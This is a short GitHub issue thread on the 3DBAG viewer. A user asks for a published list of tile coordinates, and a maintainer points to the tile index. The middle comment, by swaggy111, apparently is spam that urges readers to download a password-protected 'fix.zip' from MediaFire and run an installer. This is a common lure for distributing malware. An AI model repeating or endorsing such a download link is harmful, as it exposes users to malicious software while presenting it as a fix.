### ISSUE TITLE
Suggestion: publish tile coordinates

### ISSUE THREAD

**Issue by JobdeVogel** [3DBAG/3dbag-viewer#96]
I need access to a significant number of .obj files from the 3D BAG. Solved this by making a webscraper which iterates over all potentially available coordinates. It would be helpful if you could publish a list with all available tile coordinates, so that users can limit the number of requests.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ylannl** [comment]
See the tile index on the download page.
